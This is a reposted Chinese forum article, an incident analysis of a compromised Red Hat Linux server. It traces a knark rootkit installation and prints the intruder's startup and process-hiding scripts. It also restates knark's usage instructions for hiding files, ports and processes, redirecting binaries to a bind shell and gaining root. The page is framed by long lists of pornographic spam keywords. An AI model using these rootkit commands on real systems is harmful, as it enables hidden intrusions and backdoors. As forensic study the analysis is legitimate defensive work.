亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 很酷的一篇入侵分析! (轉自非常空間).txt

?? LINUX下的安裝聲卡等操作和技巧介紹
?? TXT
字號:
作者:cnnetfan
email: cnnetfan@hotmail.com
日期:8/27/2001 5:08:24 PM
很酷的一篇入侵分析! 
發言者:kent 發言時間:2001-05-21 12:01:44 

--------------------------------------------------------------------------------
 
一、意外 

時間:2001-3-11下午 
地點:某臺RedHat Linux機器: 
#uname -a 
Linux *.*.cn.net 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686unknown 
俺習慣性地先進到/etc/rc.d/init.d,看了一下,馬上發現異狀: 
#ls -la 
…… 
-rwxr-xr-x 1 root root 2775 Mar 26 1999 netfs 
-rwxr-xr-x 1 root root 5537 Mar 3 21:23 network 
-rwxr-xr-x 1 root root 2408 Apr 16 1999 nfs 
…… 

二、初步檢查 

明顯是個新手干的嘛,network文件被人動過了,咱們用stat命令看看先: 

#stat network 
File: "network" 
Size: 5537 Filetype: Regular File 
Mode: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root) 
Device: 3,1 Inode: 269454 Links: 1 
Access: Sun Mar 11 10:59:59 2001(00000.05:53:41) 
Modify: Sun Mar 4 05:23:41 2001(00007.11:29:59) 
Change: Sun Mar 4 05:23:41 2001(00007.11:29:59) 

最后被人改動的時間是3月4號的凌晨。讓我們來看看他往文件里加了什么吧: 

#cat network 
…… 
/usr/lib/libdd.so.1 

就是這么一句,加在文件末尾,看來的確是手段不甚高明。瞧瞧這是個什么文件先 

#file /usr/lib/libdd.so.1 
/usr/lib/libdd.so.1: ELF 32-bit LSB executable, Intel 80386,version 1, dynamically linked (uses shared libs), not stripped 

哦,是個二進制的可執行文件,執行下strings看是否眼熟 

#strings /usr/lib/libdd.so.1 
/lib/ld-linux.so.2 
__gmon_start__ 
libc.so.6 
system 
__deregister_frame_info 
_IO_stdin_used 
__libc_start_main 
__register_frame_info 
GLIBC_2.0 
PTRh 
/boot/.pty0/go.sh <--------這條信息看上去比較有趣 

哦,這就簡單了嘛,俺看看這里面的路徑: 

#cd /boot/.pty0 
#cat go.sh 
#!/bin/bash 
f=`ls -al /boot | grep .pty0` 
if [ -n "$f" ]; then 
cd /boot/.pty0 
./mcd -q 
cd mech1 
./mech -f conf 1>/dev/null 2>/dev/null 
cd .. 
cd mech2 
./mech -f conf 1>/dev/null 2>/dev/null 
cd .. 
cd mech3 
./mech -f conf 1>/dev/null 2>/dev/null 
cd .. 

/sbin/insmod paraport.o 1>/dev/null 2>/dev/null 
/sbin/insmod iBCS.o 1>/dev/null 2>/dev/null 
./ascunde.sh 
fi 
有點暈,看不明白mcd、mech這些東西是干嘛用的,再看一下下一個腳本是什么: 
#cat ascunde.sh 

#!/bin/bash 
for proces in `/bin/cat /boot/.pty0/hdm`; do 
P=`/sbin/pidof $proces` 
if [ -n "$P" ]; then 
killall -31 $proces 1>/dev/hdm 2>/dev/hdm 
fi 
done 
for port in `/bin/cat /boot/.pty0/hdm1`; do 
./nethide `./dec2hex $port` 1>/dev/hdm 2>/dev/hdm 
done 
for director in `/bin/cat /boot/.pty0/hdm2`; do 
./hidef $director 1>/dev/hdm 2>/dev/hdm 
done 

看到這里,事情開始有趣了,這似乎不是一個三流的scriptkiddle干的活嘛,打個包拖回來先,于是俺 

#cd /boot 
#ls -la 
total 2265 
drwxr-xr-x 3 root root 1024 Mar 11 03:01 . 
drwxr-xr-x 21 root root 1024 Mar 2 03:37 .. 
lrwxrwxrwx 1 root root 19 Sep 26 1999 System.map ->System.map-2.2.5-15 
-rw-r--r-- 1 root root 186704 Apr 20 1999 System.map-2.2.5-15 
-rw-r--r-- 1 root root 512 Sep 26 1999 boot.0300 
-rw-r--r-- 1 root root 4544 Apr 13 1999 boot.b 
-rw-r--r-- 1 root root 612 Apr 13 1999 chain.b 
-rw------- 1 root root 9728 Sep 26 1999 map 
lrwxrwxrwx 1 root root 20 Sep 26 1999 module-info ->module-info-2.2.5-15 
-rw-r--r-- 1 root root 11773 Apr 20 1999 module-info-2.2.5-15 
-rw-r--r-- 1 root root 620 Apr 13 1999 os2_d.b 
-rwxr-xr-x 1 root root 1469282 Apr 20 1999 vmlinux-2.2.5-15 
lrwxrwxrwx 1 root root 16 Sep 26 1999 vmlinuz ->vmlinuz-2.2.5-15 
-rw-r--r-- 1 root root 617288 Apr 20 1999 vmlinuz-2.2.5-15 

咦,事情更有趣了……居然沒有看到.pty0的目錄 

#cd .pty0 
#ls -laF 
total 1228 
drwxr-xr-x 3 root root 1024 Mar 11 03:01 ../ 
-rwxr-xr-x 1 root root 345 Mar 3 21:23 ascunde.sh* 
-rwxr-xr-x 1 root root 12760 Mar 3 21:23 dec2hex* 
-rwxr-xr-x 1 root root 13414 Mar 3 21:23 ered* 
-rwxr-xr-x 1 root root 358 Mar 7 19:03 go.sh* 
-rwxr-xr-x 1 root root 3872 Mar 3 21:23 hidef* 
-rw-r--r-- 1 root root 956 Mar 3 21:23 iBCS.o 
-rw-r--r-- 1 root root 524107 Mar 7 18:40 m.tgz 
-rwxr-xr-x 1 root root 656111 Mar 3 21:23 mcd* 
drwxr-xr-x 4 root root 1024 Mar 7 19:00 mech1/ 
drwxr-xr-x 4 root root 1024 Mar 9 19:50 mech2/ 
drwxr-xr-x 4 root root 1024 Mar 9 19:20 mech3/ 
-rwxr-xr-x 1 root root 12890 Mar 3 21:23 nethide* 
-rw-r--r-- 1 root root 10948 Mar 3 21:23 paraport.o 
-rw-r--r-- 1 root root 522 Mar 3 21:23 ssh_host_key 
-rw------- 1 root root 512 Mar 11 04:16 ssh_random_seed 
-rw-r--r-- 1 root root 677 Mar 3 21:23 sshd_config 

看來是加載了某個lkm了,比較討厭。 

#/sbin/lsmod 
Module Size Used by 
nfsd 150936 8 (autoclean) 
lockd 30856 1 (autoclean) [nfsd] 
sunrpc 52356 1 (autoclean) [nfsd lockd] 
3c59x 18920 1 (autoclean) 

這些是正常的lkm么?前三個模塊跟rpc有關,不知開了哪些rpc服務 

#/usr/sbin/rpcinfo -p localhost 
program vers proto port 
100000 2 tcp 111 rpcbind 
100024 1 tcp 664 status 
100011 1 udp 673 rquotad 
100005 3 tcp 695 mountd 
100003 2 udp 2049 nfs 
100021 3 tcp 1024 nlockmgr 

原來如此,難怪會被入侵,該開的全開了。不過也證明了nfsd,lockd,sunrpc這三個模塊沒問題了。 
再來看看網卡吧,3c59x是網卡的驅動模塊。 

#/sbin/ifconfig -a 
/sbin/ifconfig -a 
lo Link encap:Local Loopback 
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 
UP LOOPBACK RUNNING MTU:3924 Metric:1 
RX packets:380640 errors:3374 dropped:0 overruns:0 
TX packets:0 errors:0 dropped:0 overruns:380640 

eth0 Link encap:10Mbps Ethernet HWaddr 00:10:5A:63:5B:05 
inet addr:*.*.*.* Bcast:*.*.*.255 Mask:255.255.255.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:71144611 errors:820101 dropped:0 overruns:0 
TX packets:0 errors:0 dropped:0 overruns:436037129 
Interrupt:10 Base address:0xe400 

#dmesg|grep eth0 
eth0: 3Com 3c905B Cyclone 100baseTx at 0xe400, 00:10:5a:63:5b:05,IRQ 10 
eth0: Setting promiscuous mode. 
device eth0 entered promiscuous mode 

看來這些模塊都是正常的,但比較狠的就是——device eth0 enteredpromiscuousmode——看來這入侵者架了sniffer開聽了,但關鍵是現在這個入侵者加載了個俺看不到的家伙,有些暈了……咦,對了,看看文件名先…… 

三、模塊介紹 

nethide?似乎有點印象……好吧,到俺的一堆破爛里找找……咦,找到一篇knarkhacking的文章,里面有提到nethide,先當下一個來玩玩吧,有個版本號為knark-0.59的,是對LinuxKernel 2.2的,行……咱們先看看這是什么樣的內核模塊: 

除了taskhack.c之處,所有這些文件都是基于knark.o模塊的正確加載。 

hidef用來隱藏你的文件或者目錄,你可以建立一個目錄,比如/boot/.pty0,然后鍵入 
./hidef/boot/.pty0于是這這個目錄便被隱藏起來,并且連du之類的命令也不能 
找出它來,同樣的,子目錄下的任何文件也一樣地被藏得天衣無縫 

ered用來重定向執行某個程序,比如說,你把一個bindsh*ll 的程序拷到/boot/.pty0/bindsh*ll , 
然后可以用./ered /bin/ls/boot/.pty0/bindsh*ll 這樣的命令,將ls重定向到bindsh*ll , 
當然,這樣的話,ls是沒變,但已經不能正確執行了。如果要清除所有的命令重定向,可以 
鍵入./ered -c 

nethide用來隱藏/proc/net/tcp及/proc/net/udp里的連接進程——netstat就是從這里面獲取信息并 
輸出的,比如你要隱藏端口43981的連接信息,你必須鍵入: 
./nethide ":ABCD " 
你就可以象grep-v一樣,過濾掉你不想讓人看到的網絡連接信息了,比如你用: 
netstat -at 
可能會有一行連接(ssh)的記錄是這樣的: 
Proto Recv-Q Send-Q Local Address Foreign Address State 
tcp 0 0 localhost:ssh localhost:1023 ESTABLISHED 
我們來看看/proc/net/tcp里面的情況如何: 
cat /proc/net/tcp 
其中相應的行應該是這樣的: 
local_address rem_address blablabla... 
0:0100007F:0016 0100007F:03FF 01 00000000:00000000 00:0000000000000000 
如果我們想隱藏關于127.0.0.1這個IP地址的所有信息,首先就必須把它“翻譯”成這種格式,127用 
十六進制表示是7F,0是00,1是01,于是地址就是0100007F,然后,再跟上端口22是0016,就是: 
0100007F:0016了,于是我們鍵入: 
./nethide "0100007F:0016" 便可以將其隱藏得很漂亮了。 

rootme 利用這個家伙,你可以不需要suid位,就能拿到root的權限嘍: 
./rootme /bin/sh 
你也可以用這種方式來運行: 
./rootme /bin/ls -l /root 
這里必須注意,要輸入完整的路徑名。 


taskhack 可以改變運行著的進程的uid,euid,gid,egid等。 
./taskhack -alluid=0 pid 
這可以把該進程所有的*uid(uid, euid, suid, fsuid)都改成0 
你用: 
ps aux | grep bash 
creed 91 0.0 1.3 1424 824 1 S 15:31 0:00 -bash 

rexec 遠程執行命令,比如: 
./rexec www.microsoft.com haxored.server.nu /bin/touch /LUDER 


knark還有一些其它的特性: 
將信號31發送給某個進程,能夠在/proc里將進程文件隱藏起來,這樣ps及top 
都無法看到,比如: 
#kill -31 pid 
如果這個進程還有它的子進程,那么也將一同被隱藏起來,所以如果你把你的sh*ll 
隱藏掉的話,所有你鍵入的進程將都是不可見的。如果你想再看看,被隱藏起來的進 
程藏在什么地方的話,可以看/proc/knark/pids文件,這里列出所有隱藏的家伙;) 

闖入一個系統中,sniffer總是入侵者們用來擴大戰果的玩意兒,現在也存在許多小工具 
能夠偵測到網卡是否被置于混雜模式,但如果你加載了這個模塊,當人們在查詢SIOCGIFFLAGS 
的標志位時,IFF_PROMISC——接口為隨機(promiscuous)模式總是會被隱藏的。 

這個包中還帶有另一個小工具modhide,這個模塊加載后,可以將最后加載至系統中的模塊從 
模塊列表里移除——也就是/proc/module里面看不到它,示例如下: 
#/sbin/insmod knark.o 
#/sbin/lsmod | grep knark 
knark 6640 0 (unused) 
#/sbin/insmod modhide.o 
#lsmod | grep knark 
啥也沒有了 

最重要的是,我們可以在/proc/knark/目錄——當然也是隱藏的——下面找到所有被藏起來的東西的資料。 

四、分析 

我們可以試著看看: 

#cd /proc/knark/ 
#cat files 
HIDDEN FILES 
/boot/.pty0 
/usr/lib/logem 

這兩個目錄就是被藏起來的了;) 

#cat nethides 
HIDDEN STRINGS (without the quotes) 
"CB0C" 
"17" 
":0947" 

這里是三個netstat的隱藏。 

#cat pids 
EUID PID COMMAND 
0 112 mcd 
0 338 dittrich 

兩個后門,一個bindsh*ll ,一個是偽裝成ssh的,進程都被隱藏了。 

#cat redirects 
REDIRECT FROM REDIRECT TO 
/bin/login /usr/lib/logem/login2 

可執行程序重定向,這里是把login給重定向了。 

現在很清楚了,黑客進來之后,首先是上傳上/usr/lib/logem下面的文件,包括幾個腳本及剛才分析的內核模塊,以及幾個后門,如login后門,ssh后門,然后修改了/etc/rc.d/init.d/network文件,加上/usr/lib/libdd.so.1行,以便系統啟動時自加載,(/etc/inetd.conf里也被加上了一句echostream tcp nowait root /usr/sbin/echod/usr/sbin/echod,這樣入侵者可以遠程啟動后門及內核模塊,這里的echod與libdd.so.1是同樣文件),這個程序指向/boot/.pty0/go.sh: 

這里面啟動了幾個irc的cliend端,連到國外的一些server上掛著——我不太理解為啥老外都這樣?我連上去whois了一下,結果如下: 

Coitze is ~statd@the.ip.of.the_hacked_machine * Ask your girlfriend:> 
Coitze on @#radio21pitesti @#mafiotzii 
Coitze using McLean.VA.US.Undernet.Org CAIS Internet, US 
Coitze End of /WHOIS list. 

而go.sh又指向ascunde.sh,這里是這樣的: 

for proces in `/bin/cat /boot/.pty0/hdm`; do<-------hdm文件里有ncd、sh、mcd三行,也就是有這些東西是入侵者想隱藏的 
P=`/sbin/pidof $proces` 
if [ -n "$P" ]; then 
killall -31 $proces 1>/dev/hdm 2>/dev/hdm <-------發出kill-31的信號,調用加載的內核模塊隱藏進程fi 

摘自:明盾大學網絡安全學院 
作者:blan 

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
国产夫妻精品视频| 国产精品123| 一区二区三区四区精品在线视频| 精品成人免费观看| 精品国产乱码久久久久久图片| 欧美丰满美乳xxx高潮www| 在线精品视频免费观看| 一本大道久久a久久精二百| 99精品欧美一区二区三区小说| 成人黄色a**站在线观看| 成人小视频免费观看| 成人免费高清在线| 欧美日韩一区二区在线观看视频| 97久久超碰国产精品| 一本到不卡精品视频在线观看| 在线观看www91| 欧美日本国产视频| 日韩欧美高清在线| 久久久蜜桃精品| 国产精品福利一区| 伊人色综合久久天天人手人婷| 一区二区三区中文在线| 日本不卡1234视频| 国产精品99久久久久久有的能看 | 精品国产污污免费网站入口 | 天天综合天天做天天综合| 婷婷开心久久网| 国产精品亚洲午夜一区二区三区 | 日本91福利区| 国产成人综合在线播放| 一本大道久久精品懂色aⅴ| 5566中文字幕一区二区电影| 欧美不卡一区二区三区四区| 国产精品免费免费| 怡红院av一区二区三区| 日韩精品福利网| 国产成人亚洲综合a∨婷婷图片| 不卡一卡二卡三乱码免费网站| 91成人网在线| 久久九九影视网| 亚洲精品免费在线| 精一区二区三区| 色婷婷综合久色| 精品久久99ma| 亚洲一区二区视频在线| 国产综合久久久久久久久久久久| 91首页免费视频| 久久久久久久久久久久久久久99 | 欧美日韩中文字幕精品| 久久久久久久精| 调教+趴+乳夹+国产+精品| 成人精品高清在线| 91精品国产全国免费观看| 国产精品国模大尺度视频| 久久国产精品72免费观看| 欧美夫妻性生活| 亚洲欧美国产三级| 国产999精品久久久久久| 5858s免费视频成人| 亚洲精品国产成人久久av盗摄| 国产成人一区在线| 欧美一级欧美一级在线播放| 亚洲欧美激情插| 91麻豆精东视频| 国产精品久久久久久户外露出| 精品在线视频一区| 制服丝袜亚洲播放| 天天综合色天天综合| 在线观看91视频| 夜夜嗨av一区二区三区网页 | 福利一区福利二区| 久久综合九色综合97婷婷| 日韩av在线免费观看不卡| 精品视频一区三区九区| 亚洲女女做受ⅹxx高潮| av中文字幕在线不卡| 中文字幕色av一区二区三区| 国产成人久久精品77777最新版本| 日韩午夜激情免费电影| 石原莉奈在线亚洲三区| 欧美精品第1页| 日韩黄色免费电影| 欧美久久久久久久久久| 久久99久久久久| 久久影院午夜片一区| 国产一区91精品张津瑜| 久久网站热最新地址| 国产精品一二三区在线| 国产精品久久久久久久久快鸭 | 777a∨成人精品桃花网| 日韩国产在线观看| 欧美一区二区免费| 久久99精品网久久| 国产精品视频你懂的| 99精品视频一区| 亚洲电影在线免费观看| 欧美一区二区免费视频| 国产精品自拍毛片| 国产喷白浆一区二区三区| av亚洲精华国产精华| 亚洲午夜激情av| 日韩欧美一区中文| 国产成人丝袜美腿| 最好看的中文字幕久久| 欧美日本高清视频在线观看| 韩国在线一区二区| 亚洲日本在线观看| 欧美军同video69gay| 国产一区二区美女| 亚洲欧美一区二区三区久本道91| 欧美在线你懂的| 精品一区二区三区视频在线观看| 国产精品久久久久久久午夜片| 色av综合在线| 日韩va欧美va亚洲va久久| 国产欧美一区二区三区鸳鸯浴 | 蜜桃视频一区二区三区在线观看 | 91九色02白丝porn| 久久不见久久见中文字幕免费| 中文字幕免费观看一区| 欧美精品电影在线播放| 99精品视频一区| 国产精品中文字幕欧美| 日韩专区在线视频| 亚洲色图欧美偷拍| 久久久国际精品| 欧美一区2区视频在线观看| av色综合久久天堂av综合| 九九在线精品视频| 亚洲国产综合视频在线观看| 欧美国产一区二区在线观看 | 韩国v欧美v亚洲v日本v| 视频一区欧美日韩| 一区二区欧美在线观看| 亚洲国产精品精华液2区45| 欧美一区二区三区婷婷月色| 91视视频在线观看入口直接观看www | 欧美国产精品劲爆| 亚洲精品在线免费播放| 3atv一区二区三区| 欧美日韩精品欧美日韩精品一| 91小视频在线免费看| 成人av小说网| 成人av在线网站| 成人黄色大片在线观看| 丁香五精品蜜臀久久久久99网站| 九九精品视频在线看| 美女精品一区二区| 麻豆精品在线看| 日本aⅴ亚洲精品中文乱码| 五月天丁香久久| 天堂av在线一区| 视频一区中文字幕| 亚洲国产精品久久久久秋霞影院 | 亚洲午夜视频在线| 亚洲靠逼com| 一区二区三区产品免费精品久久75| 国产精品视频看| 亚洲人一二三区| 亚洲图片激情小说| 一区二区三区欧美在线观看| 亚洲视频图片小说| 亚洲国产视频直播| 午夜电影一区二区三区| 免费在线观看一区| 国产成人自拍网| 91一区二区三区在线播放| 欧美怡红院视频| 在线播放亚洲一区| 26uuu精品一区二区| 久久久久久久久久久电影| 中文字幕一区二区三区精华液| 国产精品国产三级国产a| 一区二区三国产精华液| 天天操天天综合网| 国产精品一区二区在线观看网站| 高潮精品一区videoshd| 欧美在线免费视屏| 欧美精品一区二区三区蜜桃视频 | 色噜噜久久综合| 欧美三级中文字幕在线观看| 欧美电影在线免费观看| 久久中文娱乐网| 一区二区三区在线视频免费 | 26uuu精品一区二区| 国产精品久久久久久亚洲毛片| 亚洲福利视频三区| 国产精品影视在线| 色婷婷综合久久久中文一区二区| 欧美精品自拍偷拍动漫精品| 精品剧情在线观看| 亚洲免费观看视频| 日本一不卡视频| 亚洲高清免费视频| 亚洲成av人片在线观看无码| 免费成人av在线播放| gogogo免费视频观看亚洲一| 欧美福利电影网| 日韩一区欧美小说| 精品一区二区国语对白|